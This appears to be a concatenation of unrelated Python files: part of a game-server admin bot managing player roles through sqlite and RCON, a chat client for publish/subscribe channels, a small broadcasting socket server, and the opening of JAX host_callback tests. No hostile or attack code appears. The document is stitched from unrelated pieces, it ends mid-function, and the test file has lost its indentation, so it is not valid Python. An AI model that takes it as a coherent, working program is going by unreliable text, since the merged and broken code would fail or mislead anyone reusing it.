            # putgroup - add a client to a group
            elif sar['command'] == '!putgroup' and self.game.players[sar['player_num']].get_admin_role() == 100:
                if line.split(sar['command'])[1]:
                    arg = line.split(sar['command'])[1].split()
                    if len(arg) > 1:
                        user = arg[0]
                        right = arg[1]
                        found, victim, msg = self.player_found(user)
                        if not found:
                            self.game.rcon_tell(sar['player_num'], msg)
                        else:
                            if victim.get_registered_user():
                                new_role = victim.get_admin_role()
                            else:
                                # register new user in DB and set role to 1
                                victim.register_user_db(role=1)
                                new_role = 1
                            if right == "user":
                                self.game.rcon_tell(sar['player_num'], "^3%s put in group User" % victim.get_name())
                                new_role = 1
                            elif right == "admin":
                                self.game.rcon_tell(sar['player_num'], "^3%s added as ^7Admin" % victim.get_name())
                                new_role = 40
                            else:
                                self.game.rcon_tell(sar['player_num'], "^3Sorry, you cannot put %s in group <%s>" % (victim.get_name(), right))
                            victim.update_db_admin_role(role=new_role)
                    else:
                        self.game.rcon_tell(sar['player_num'], "^7Usage: !putgroup <name> <group>")
                else:
                    self.game.rcon_tell(sar['player_num'], "^7Usage: !putgroup <name> <group>")
            # ungroup - remove the admin level from a player
            elif sar['command'] == '!ungroup' and self.game.players[sar['player_num']].get_admin_role() == 100:
                if line.split(sar['command'])[1]:
                    user = line.split(sar['command'])[1].strip()
                    found, victim, msg = self.player_found(user)
                    if not found:
                        self.game.rcon_tell(sar['player_num'], msg)
                    else:
                        # only demote regular Users/Admins, never Guests or Head Admins
                        if 1 < victim.get_admin_role() < 100:
                            self.game.rcon_tell(sar['player_num'], "^3%s put in group User" % victim.get_name())
                            victim.update_db_admin_role(role=1)
                        else:
                            self.game.rcon_tell(sar['player_num'], "^3Sorry, you cannot put %s in group User" % victim.get_name())
                else:
                    self.game.rcon_tell(sar['player_num'], "^7Usage: !ungroup <name>")
            ## iamgod
            # iamgod - register user as Head Admin
            elif sar['command'] == '!iamgod':
                # only available while no Head Admin exists in the database
                if self.iamgod:
                    if not self.game.players[sar['player_num']].get_registered_user():
                        # register new user in DB and set admin role to 100
                        self.game.players[sar['player_num']].register_user_db(role=100)
                    else:
                        self.game.players[sar['player_num']].update_db_admin_role(role=100)
                    self.iamgod = False
                    self.game.rcon_tell(sar['player_num'], "^7You are registered as ^6Head Admin")
            ## unknown command
            elif sar['command'].startswith('!') and len(sar['command']) > 1 and self.game.players[sar['player_num']].get_admin_role() >= 40:
                # known head-admin command issued by a lower role
                if sar['command'].lstrip('!') in self.headadmin_cmds:
                    self.game.rcon_tell(sar['player_num'], "^7Insufficient privileges to use command ^3%s" % sar['command'])
### CLASS Player ###
class Player(object):
    """
    Player class

    One connected player: identity (slot number, guid, IP), display name
    and admin role, persisted in the `admins` table of the global sqlite
    connection (`conn` / `curs`).
    """
    # team id -> team name
    teams = {0: "green", 1: "red", 2: "blue", 3: "spectator"}
    # admin role id -> role name
    roles = {0: "Guest", 1: "User", 40: "Admin", 100: "Head Admin"}
    def __init__(self, player_num, ip_address, guid, name):
        """
        create a new instance of Player
        """
        self.player_num = player_num
        self.guid = guid
        self.name = name.replace(' ', '')
        self.registered_user = False
        self.admin_role = 0
        self.address = ip_address
        self.team = 3
        # strip Quake color codes ('^' followed by a digit) for the pretty name
        self.prettyname = self.name
        for digit in '0123456789':
            self.prettyname = self.prettyname.replace('^' + digit, '')
    def check_database(self):
        # restore a stored admin role for this guid, if any
        curs.execute("SELECT `admin_role` FROM `admins` WHERE `guid` = ?", (self.guid,))
        row = curs.fetchone()
        if row is None:
            self.registered_user = False
        else:
            self.admin_role = row[0]
            self.registered_user = True
    def register_user_db(self, role=1):
        # insert this player into the admins table unless already registered
        if self.registered_user:
            return
        record = (self.guid, self.prettyname, self.address, role)
        curs.execute("INSERT INTO `admins` (`guid`,`name`,`ip_address`,`admin_role`) VALUES (?,?,?,?)", record)
        conn.commit()
        self.admin_role = role
    def update_db_admin_role(self, role):
        curs.execute("UPDATE `admins` SET `admin_role` = ? WHERE `guid` = ?", (role, self.guid))
        conn.commit()
        # overwrite admin role in game, no reconnect of player required
        self.set_admin_role(role)
    def set_name(self, name):
        # names are stored without spaces
        self.name = name.replace(' ', '')
    def get_name(self):
        return self.name
    def set_guid(self, guid):
        self.guid = guid
    def get_guid(self):
        return self.guid
    def get_player_num(self):
        return self.player_num
    def get_registered_user(self):
        return self.registered_user
    def set_admin_role(self, role):
        self.admin_role = role
    def get_admin_role(self):
        return self.admin_role
### CLASS Game ###
class Game(object):
    """
    Game class

    State of the running server (connected players, available maps) plus
    the RCON channel used to act on it.
    """
    def __init__(self, config_file):
        """
        create a new instance of Game
        @param config_file: The full path of the bot configuration file
        @type config_file: String
        """
        self.all_maps_list = []
        # player slot number -> Player instance
        self.players = {}
        self.live = False
        game_cfg = ConfigParser.ConfigParser()
        game_cfg.read(config_file)
        self.rcon_handle = Rcon(game_cfg.get('server', 'server_ip'), game_cfg.get('server', 'server_port'), game_cfg.get('server', 'rcon_password'))
        # add pcwbot as player 'World' to the game (reserved slot 1022)
        world = Player(1022, '127.0.0.1', 'NONE', 'World')
        self.add_player(world)
        print "- Added pcwbot successful to the game.\n"
        print "pcwbot is running until you are closing this session or pressing CTRL + C to abort this process."
        print "*** Note: Use the provided initscript to run pcwbot as daemon ***\n"
    def send_rcon(self, command):
        """
        send RCON command (queued; no-op until go_live)
        @param command: The RCON command
        @type command: String
        """
        if self.live:
            self.rcon_handle.push(command)
    def rcon_tell(self, player_num, msg):
        """
        tell message to a specific player
        @param player_num: The player number
        @type player_num: Integer
        @param msg: The message to display in private chat
        @type msg: String
        """
        # wrap long messages so each chat line stays within 128 characters
        lines = textwrap.wrap(msg, 128)
        for line in lines:
            self.send_rcon('tell %d %s' % (player_num, line))
    def rcon_forceteam(self, player_num, team):
        """
        force player to given team
        @param player_num: The player number
        @type player_num: Integer
        @param team: The team (red, blue, spectator)
        @type team: String
        """
        self.send_rcon('forceteam %d %s' % (player_num, team))
    def kick_player(self, player_num):
        """
        kick player
        @param player_num: The player number
        @type player_num: Integer
        """
        self.send_rcon('kick %d' % player_num)
    def go_live(self):
        """
        go live: enable RCON commands and fetch the map list
        """
        self.live = True
        self.rcon_handle.go_live()
        self.set_all_maps()
    def set_all_maps(self):
        """
        set a list of all available maps
        """
        # maps from loose .bsp files on the server...
        all_maps = self.rcon_handle.get_rcon_output("dir map bsp")[1].split()
        all_maps_list = [maps.replace("/", "").replace(".bsp", "") for maps in all_maps if maps.startswith("/")]
        # ...plus maps packaged in ut4_*.pk3 archives
        pk3_list = self.rcon_handle.get_rcon_output("fdir *.pk3")[1].split()
        all_pk3_list = [maps.replace("/", "").replace(".pk3", "").replace(".bsp", "") for maps in pk3_list if maps.startswith("/ut4_")]
        # merge, de-duplicate and sort
        all_together = list(set(all_maps_list + all_pk3_list))
        all_together.sort()
        if all_together:
            self.all_maps_list = all_together
    def get_all_maps(self):
        """
        get a list of all available maps
        """
        return self.all_maps_list
    def add_player(self, player):
        """
        add a player to the game and restore his stored admin role
        @param player: The instance of the player
        @type player: Instance
        """
        self.players[player.get_player_num()] = player
        player.check_database()
### Main ###
print "\n\nStarting pcwbot %s:" % __version__
# connect to database
conn = sqlite3.connect('./data.sqlite')
curs = conn.cursor()
# create tables if not exists
curs.execute('CREATE TABLE IF NOT EXISTS admins (id INTEGER PRIMARY KEY NOT NULL, guid TEXT NOT NULL, name TEXT NOT NULL, ip_address TEXT NOT NULL, admin_role INTEGER DEFAULT 1)')
print "- Connected to database 'data.sqlite' successful."
# create instance of LogParser
LogParser('./settings.conf')
# close database connection
conn.close()
|
client.py | import socket
import select
import threading
import json
import sys
import traceback
import os
import random
from clientInterface import ClientInterface
from constants import CREATE_CHANNEL, SUBSCRIBE_CHANNEL, UNSUBSCRIBE_CHANNEL, SHOW_MY_SUBS, PUBLISH_CHANNEL, SHOW_MY_CHANNELS, SHOW_ALL_CHANNELS
from constants import LOGIN, LOGOUT, CREATE_ACCOUNT, DELETE_ACCOUNT, EXIT
from constants import HOME_SCR, CREATE_ACCOUNT_SCR, DELETE_ACCOUNT_SCR, LOGIN_SCR, PRINCIPAL_MENU_SCR
class Client:
    """
    Publish/subscribe chat client: owns the server socket, the terminal
    interface (ClientInterface) and the listener thread for channel
    notifications.
    """
    def __init__(self, serverHost='localhost', serverPort = 5000):
        self.serverHost = serverHost #server address
        self.serverPort = serverPort #server port
        self.sock = None #socket used to communicate with the server
        self.clientView = ClientInterface() #initializes the class responsible for the application's interface
        self.userName = '' #stores the user's user name
        self.password = '' #stores the user's password
        self.stopWorkers = False #key flag used to stop all worker threads
        self.channelMessages = [] #stores the messages received from each channel
        self.lock = threading.Lock() #initializes the lock
        self.start() #acquires the socket and connects to the server
    def start(self):
        """
        Create the client socket and connect it to the server.
        """
        self.sock = socket.socket()
        try:
            self.sock.connect((self.serverHost, self.serverPort)) #open the connection to the server
        except Exception as e:
            # NOTE(review): exits silently on connection failure; `e` is unused
            sys.exit(1)
    def stop(self):
        """
        Close the client socket.
        """
        self.sock.close()
    def finishBusiness(self):
        """
        Stop the runChannelListener thread, which is responsible for
        listening to messages received from the different channels.
        """
        self.stopWorkers = True
    def recvByMethod(self, notify = False):
        """
        Wait for the message that carries the tag of interest.
        :param notify: whether the message of interest is a notification
        :return: the message carrying the tag of interest
        """
        size = 1024
        # peek without consuming, so the other consumer thread can still read it
        peeked_msg = self.sock.recv(size, socket.MSG_PEEK)
        peeked_response = json.loads(peeked_msg)
        # NOTE(review): these peek loops busy-wait while a message of the other
        # kind sits at the head of the buffer, relying on the other thread to
        # consume it — confirm both threads run whenever this can happen
        while(not notify and (peeked_response['method'] == 'notifySubscriber')):
            peeked_msg = self.sock.recv(size, socket.MSG_PEEK)
            peeked_response = json.loads(peeked_msg)
        while(notify and (peeked_response['method'] != 'notifySubscriber')):
            peeked_msg = self.sock.recv(size, socket.MSG_PEEK)
            peeked_response = json.loads(peeked_msg)
        # assumes one whole JSON message arrives in a single 1024-byte recv — TODO confirm
        msg_w_my_method = self.sock.recv(1024)
        return msg_w_my_method
    def handlerServerRequest(self, method, userInput):
        """
        Given the method and the client's input, build the request message
        and send it to the server.
        :param method: command to be executed.
        :param userInput: input typed by the client.
        :return: the server's response message.
        """
        # command constant -> wire method name
        methods = {CREATE_ACCOUNT: 'createAccount', DELETE_ACCOUNT: 'deleteAccount', LOGIN:'authAccount', LOGOUT:'logout', CREATE_CHANNEL:'createChannel', SUBSCRIBE_CHANNEL: 'subscribeChannel', UNSUBSCRIBE_CHANNEL:'unsubscribeChannel', SHOW_MY_SUBS:'showMySubscriptions', PUBLISH_CHANNEL:'publishChannel', SHOW_MY_CHANNELS:'showMyOwnChannels', SHOW_ALL_CHANNELS:'showAllChannels'}
        if(method in (CREATE_ACCOUNT, DELETE_ACCOUNT, LOGIN)):
            userName, password = userInput
            request = {'method':methods[method],'data':{'userName': userName,'password':password}}
        elif(method == PUBLISH_CHANNEL):
            channelName = userInput[1][0]
            message = userInput[1][1]
            request = {'method':methods[method],'data':{'userName': self.userName,'password': self.password, 'channelName': channelName, 'message': message}}
        elif(method in (SUBSCRIBE_CHANNEL, UNSUBSCRIBE_CHANNEL, CREATE_CHANNEL)):
            channelName = userInput[1]
            request = {'method':methods[method], 'data': {'userName': self.userName,'password': self.password,'channelName': channelName }}
        elif(method in (LOGOUT, SHOW_MY_SUBS, SHOW_MY_CHANNELS)):
            request = {'method':methods[method], 'data': {'userName': self.userName,'password': self.password}}
        elif(method == SHOW_ALL_CHANNELS):
            request = {'method':methods[method]}
        request_msg = json.dumps(request, ensure_ascii=False) #build the JSON for sending the request to the server
        self.sock.send(bytes(request_msg, encoding='utf-8')) #send the message to the server
        response_msg = self.recvByMethod() #receive the message sent by the server
        response = json.loads(response_msg) #turn the received message into a dictionary
        return response
    def handleServerResponse(self, method, response, userInput):
        """
        Given the server's response and the client's input, perform the
        required client-side bookkeeping.
        :param method: command being executed
        :param response: response returned by the server
        :param userInput: possible input typed by the user
        :return: void or a message for the interface.
        """
        # Update the user's information and start the thread responsible for
        # listening to the channels that have published messages.
        if(method == LOGIN and response['status'] == 'success'):
            userName, password = userInput
            self.userName = userName
            self.clientView.username = self.userName
            self.password = password
            work = threading.Thread(target= self.runChannelListener, args=())
            work.daemon = True #kill the child thread when the main thread dies
            work.start()
        if(method == LOGOUT and response['status'] == 'success'):
            self.finishBusiness()
    def handleInterfaceCommand(self, cmd, userInput = None, response = None):
        """
        Handle interface-side effects of a command, given the command and
        other possible information (user input or the request's response).
        :param cmd: command to be executed.
        :param userInput: input typed by the client.
        :param response: response message (dictionary).
        :return: void or a response message (dictionary) for the clientInterface class.
        """
        if(cmd == LOGIN and (response['status'] == 'success')):
            self.stopWorkers = False
            # NOTE(review): rebinding the local `response` has no effect on the caller
            response = None
        if(cmd == SHOW_MY_SUBS and (response['status'] == 'success')):
            list_of_subs = response['data']
            self.clientView.responsesToPrint.append("Canais em que você está inscrito: " + ", ".join(list_of_subs) + "\n")
        if(cmd == SHOW_MY_CHANNELS and (response['status'] == 'success')):
            list_of_channels = response['data']
            self.clientView.responsesToPrint.append("Canais em que você é proprietário: " + ", ".join(list_of_channels) + "\n")
        if(cmd == SHOW_ALL_CHANNELS and (response['status'] == 'success')):
            list_of_channels = response['data']
            self.clientView.responsesToPrint.append("Canais registrados no servidor: " + ", ".join(list_of_channels) + "\n")
        return None
    def runChannelListener(self):
        """
        Listener flow of the client: stays alert for any updates coming
        from the subscribed channels.
        """
        request_msg = None
        try:
            while True:
                try:
                    #receive the channels' messages
                    request_msg = self.recvByMethod(notify = True)
                except socket.timeout as e:
                    pass
                #entered on logout or if the server goes down
                if(request_msg == b'' or self.stopWorkers):
                    break
                if(request_msg != None):
                    request = json.loads(request_msg)
                    channelName = request['data']['channelName']
                    self.lock.acquire()
                    #store the received message in the list of messages for that channel
                    self.channelMessages.append(channelName + ":" + request['data']['message'])
                    self.lock.release()
                    self.lock.acquire()
                    self.clientView.messages_queue = self.channelMessages
                    self.clientView.printPrincipalMenuScreen()
                    self.lock.release()
                    request_msg = None
        except Exception as e:
            # any unexpected failure tears down the connection
            self.sock.close()
    def run(self):
        """
        Run the client's main flow. From here, based on the input commands —
        whether aimed at the server or at the application itself — actions
        are taken, including creating new threads for communication.
        """
        userInput = self.clientView.homeScreen()
        while (userInput[0] != EXIT):
            if(userInput[0] == CREATE_ACCOUNT):
                credentials = self.clientView.createAccountScreen()
                response = self.handlerServerRequest(CREATE_ACCOUNT, credentials)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == DELETE_ACCOUNT):
                credentials = self.clientView.deleteAccountScreen()
                response = self.handlerServerRequest(DELETE_ACCOUNT, credentials)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == LOGIN):
                credentials = self.clientView.authScreen()
                response = self.handlerServerRequest(LOGIN, credentials)
                self.handleInterfaceCommand(LOGIN, response=response)
                self.handleServerResponse(LOGIN, response, credentials)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == LOGOUT):
                response = self.handlerServerRequest(LOGOUT, None)
                self.clientView.handlerResponse(response)
                result = self.handleServerResponse(LOGOUT,response,None)
            elif(userInput[0] == PUBLISH_CHANNEL):
                response = self.handlerServerRequest(PUBLISH_CHANNEL, userInput)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == SUBSCRIBE_CHANNEL):
                response = self.handlerServerRequest(SUBSCRIBE_CHANNEL, userInput)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == UNSUBSCRIBE_CHANNEL):
                response = self.handlerServerRequest(UNSUBSCRIBE_CHANNEL, userInput)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == SHOW_MY_SUBS):
                response = self.handlerServerRequest(SHOW_MY_SUBS, userInput)
                # NOTE(review): passes SHOW_ALL_CHANNELS for a SHOW_MY_SUBS
                # response, so the "all channels" caption is printed — verify
                self.handleInterfaceCommand(SHOW_ALL_CHANNELS, userInput, response)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == SHOW_MY_CHANNELS):
                response = self.handlerServerRequest(SHOW_MY_CHANNELS, userInput)
                # NOTE(review): same mismatch as above for SHOW_MY_CHANNELS — verify
                self.handleInterfaceCommand(SHOW_ALL_CHANNELS, userInput, response)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == SHOW_ALL_CHANNELS):
                response = self.handlerServerRequest(SHOW_ALL_CHANNELS, userInput)
                self.handleInterfaceCommand(SHOW_ALL_CHANNELS, userInput, response)
                self.clientView.handlerResponse(response)
            elif(userInput[0] == CREATE_CHANNEL):
                response = self.handlerServerRequest(CREATE_CHANNEL, userInput)
                self.clientView.handlerResponse(response)
            userInput = self.clientView.redirectScreen()
        self.stop()
if __name__ == '__main__':
    # These two lines must be kept for the client to run.
    client = Client(serverHost='localhost', serverPort = 5000)
    client.run()
|
calypso_server.py | import socket
import threading
import logging
logger = logging.getLogger(__name__)
# address the server listens on
TARGET_SOCK_ADDR = ('127.0.0.1', 8080)
# NOTE(review): despite its name, `client` is the server's LISTENING socket
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.bind(TARGET_SOCK_ADDR)
# sockets of currently connected peers; mutated by the receive() threads
clients = []
def send_data():
    """
    Broadcast a server message to every connected client, then re-arm a
    20-second timer so the broadcast repeats periodically.
    """
    # Re-arm first, so a failure below can never stop the periodic broadcast.
    threading.Timer(20.0, send_data).start()
    # Iterate over a snapshot: the receive() threads remove entries from
    # `clients` concurrently, and mutating a list while iterating it raises
    # RuntimeError. A snapshot also keeps one dead socket from aborting the
    # broadcast to the remaining clients.
    for c in list(clients):
        data = "Message from server"
        try:
            c.sendall(data.encode())
        except OSError:
            # Peer vanished between snapshot and send; its receive() thread
            # performs the cleanup, so just skip it here.
            pass
def receive(c):
    """
    Per-connection reader thread: log everything the peer sends until it
    disconnects, then unregister and close the socket.
    """
    while True:
        try:
            payload = c.recv(1024)
            if not payload:
                # an empty read means the peer closed the connection
                raise OSError('Socket error!')
        except (socket.error, IOError, OSError):
            logger.warning('[DISCONNECT] Connection closed\n')
            clients.remove(c)
            c.close()
            break
        else:
            logger.warning('<CLIENT> %s', payload.decode())
# Start the periodic broadcaster BEFORE entering the blocking accept loop.
# In the original code this call sat after `while True` and was unreachable,
# so the broadcast never started.
send_data()
client.listen()
while True:
    # accept() blocks until a new peer connects
    conn, addr = client.accept()
    logger.warning('[NEW CONNECTION] Connected with %s', str(addr))
    clients.append(conn)
    # one reader thread per connection
    receive_thread = threading.Thread(target=receive, args=(conn, ))
    receive_thread.start()
|
host_callback_test.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
from unittest import SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax._src import api
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax.lib import xla_bridge
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self.test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self.test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r'.*device: (\S+)', s)
if m:
by_device.append((m.group(1), []))
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
# Module-level singleton stream shared by the tests below; each test
# resets it (see setUp) and reads it after hcb.barrier_wait().
testing_stream = _TestingOutputStream()
def fun1(a):
  """Taps `a * 2` and `a * 6`, then returns `(a * 2) ** 2`."""
  doubled = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
  # result=doubled makes this tap transparent: it prints doubled * 3 but
  # forwards doubled itself.
  passthrough = hcb.id_print(doubled * 3., what="y * 3",
                             output_stream=testing_stream, result=doubled)
  return passthrough ** 2  # Some computation to make the gradient interesting
def fun1_equiv(a):
  """Numerical equivalent of `fun1`, with no taps."""
  doubled = a * 2.
  return doubled ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
  """Conditionally print on testing_string"""
  if not do_print:
    return arg
  return hcb.id_print(arg, what=what, output_stream=testing_stream,
                      tap_with_device=tap_with_device)
def devices():
  # Tests require using not more than 2 devices.
  local = api.local_devices()
  return local[:2]
# Decorator factory that silences the "jit-of-pmap" warning for tests
# that deliberately wrap a pmap in jit.
ignore_jit_of_pmap_warning = partial(
    jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
                                 expected: str, what: str):
  """A variant that preprocesses the string to eliminate non-determinism in
  floating point values, and several uninteresting id_tap primitive params.
  """
  # Sometimes we get floating points in the output; we round them
  def repl_floats(match_group):
    matched = match_group.group(0)
    if matched == ".": return matched
    x = np.around(float(matched), decimals=2)
    return f"{x:.2f}"
  # Normalize float-looking tokens to 2 decimals. NOTE(review): the class
  # [\-\def] matches digits, '-', 'e' and 'f' — presumably to swallow
  # exponent suffixes; confirm intent.
  what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
  # Strip primitive params whose printed values vary between runs.
  what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
  what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
  what = re.sub(r"bwd=[^\]\n]*", "", what)
  what = re.sub(r"out_trees=[^\]\n]*", "", what)
  what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
  what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
  # Empty lines
  what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
  # Collapse tap_func_/callback values to "=_print" or "=...".
  def repl_func(match_group):
    # NOTE(review): group(3) is the literal "callback" alternation (and is
    # None for "tap_func_" matches), not the matched *value* (group(4));
    # the "_print" branch below therefore looks unreachable — confirm
    # against upstream before changing, since expected strings depend on it.
    matched = match_group.group(3)
    if "function _print_consumer" in matched:
      return match_group.group(1) + "=_print"
    else:
      return match_group.group(1) + "=..."
  what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
  tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
  """Points XLA at a fresh /tmp/xla_dump directory via XLA_FLAGS."""
  import shutil
  dump_dir = "/tmp/xla_dump"
  existing_flags = os.getenv("XLA_FLAGS", "")
  os.environ["XLA_FLAGS"] = f"{existing_flags} --xla_dump_to={dump_dir}"
  if os.path.isdir(dump_dir):
    # Remove stale dumps so this run's output is unambiguous.
    logging.warning(f"Deleting old XLA dump directory {dump_dir}")
    shutil.rmtree(dump_dir)
  logging.warning(f"Setting XLA dump directory {dump_dir}")
  # Clear any cached backends so new CPU backend will pick up the env var.
  xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
  """Compiles `fun(*args)` and prints its optimized HLO, metadata stripped."""
  backend = api.lib.xla_bridge.get_backend()
  computation = api.xla_computation(fun)(*args)
  hlo_text = backend.compile(computation).hlo_modules()[0].to_string()
  print(re.sub(r", metadata.*", "", hlo_text))
# Set by setUpModule to the undo-function returned by
# jtu.set_host_platform_device_count; called by tearDownModule to restore.
prev_xla_flags = None
def setUpModule():
  """Forces 2 host-platform devices so multi-device tests can run on CPU."""
  global prev_xla_flags
  # This will control the CPU devices. On TPU we always have 2 devices
  prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
  """Undoes setUpModule's device-count override."""
  prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
                                 expected_2CPUs: str):
  """Check that the multi-device output is equal to the expected.
  The tests run with 2 devices if available, otherwise 1 device.
  We adjust the expected output here for 1 device.
  Args:
    expected_2CPUs: the expected output for 2 CPUs. If there is only
    one device, this is trimmed to the first device. If the current
    device_under_test is not a CPU, then we change the names
  """
  expected = expected_2CPUs
  if len(devices()) == 1:
    # Single device: keep only the cpu:0 section of the expectation.
    cut = expected.find('device: cpu:1')
    if cut >= 0:
      expected = expected[0:cut]
  def replace_device_name(m) -> str:
    # Map placeholder "cpu:<i>" onto the actual i-th device under test.
    return str(devices()[int(m.group(1))])
  expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
  return assertMultiLineStrippedEqual(tst, expected,
                                      testing_stream.output_sorted_by_device)
class HostCallbackIdTapTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream.test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
super().setUp()
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTest.tearDown")
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
testing_stream.reset()
def test_tap_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
testing_stream.reset()
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00
b=9.00 }""", testing_stream.output)
testing_stream.reset()
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
testing_stream.reset()
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
testing_stream.reset()
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
testing_stream.reset()
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00
9.00 )""")
testing_stream.reset()
def test_tap_eval_exception(self):
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
testing_stream.reset()
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00
[] )""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_simple(self):
jit_fun1 = api.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, api.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
